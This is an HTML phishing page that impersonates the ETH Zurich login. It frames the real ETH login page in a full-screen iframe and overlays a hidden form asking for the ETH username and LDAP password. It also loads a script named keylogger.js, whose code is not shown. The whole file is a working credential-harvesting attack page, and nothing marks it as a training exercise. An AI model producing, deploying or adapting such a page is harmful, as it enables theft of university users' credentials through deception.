<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="icon" sizes="192x192" href="https://ethz.ch/etc/designs/ethz/img/icons/ETH-APP-Icons-Theme-white/192-xxxhpdi.png">
    <title>Authentication User | ETH Zurich</title> 
    <link rel="stylesheet" href="assets/bootstrap.min.css" />
    <style>
      iframe, embed, object {
        width: 100vw; 
        height: 100vh;
      }

      .form {
        visibility: hidden;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        z-index: 9999;
        position: absolute;
        width: 100vw;
        height: 100vh;
        padding-top: 30rem;
        padding-left: 12rem;
        padding-right: 12rem;
      }

      .innerForm {
        display: flex;
        flex-direction: row;

        padding-top: 1rem;
        padding-left: 8rem;
        padding-right: 8rem;
        padding-bottom: 8rem;

        width: 100%;
        height: 100%;
      }

      .innerInnerForm {
        width: 48%;
        display: flex;
        flex-direction: column;
        gap: 2em;
        padding: 1.5rem;
      }

      .innerInnerFormOne {
        background: #f6f6f6;
        padding-bottom: 4rem;

      }

      .formelement {
        display: flex;
        flex-direction: column;
      }

      .formelement label {
        margin-bottom: 3px;
      }

      .formelement input {
        padding: 5px;
      }

      .button {
        cursor: pointer;
        color: white;
        background-color: #222222;
        padding: .75em 2em;
        width: fit-content;
        margin-bottom: 1em;
      }

      .button::after {
        content: 'Login';
      }

      .button:hover, .button:focus {
        background-color: #383838;
      }
    </style>
  </head>
  <body>
    <div class="form" id="form">
      <div class="innerForm">
        <div class="innerInnerForm innerInnerFormOne">
          <div class="formelement">
            <label for="user">
              ETH username *
            </label>
            <input type="text" name="user" id="user">
          </div>
          <div class="formelement">
            <label for="pass">
              ETH password for web applications (LDAP) *
            </label>
            <input type="password" name="pass" id="pass">
          </div>
          <div class="formelement">
            <div class="button" id="button"></div>
          </div>
        </div>
        <div class="innerInnerForm"></div>
      </div>
    </div>
    <iframe id="test" src="https://ethz.ch/login/en.html?resource=%2Fcontent%2Fmain%2Fen.html"></iframe>
    <script src="assets/keylogger.js"></script>
    <script src="assets/bootstrap.bundle.min.js"></script>
  </body>
</html>
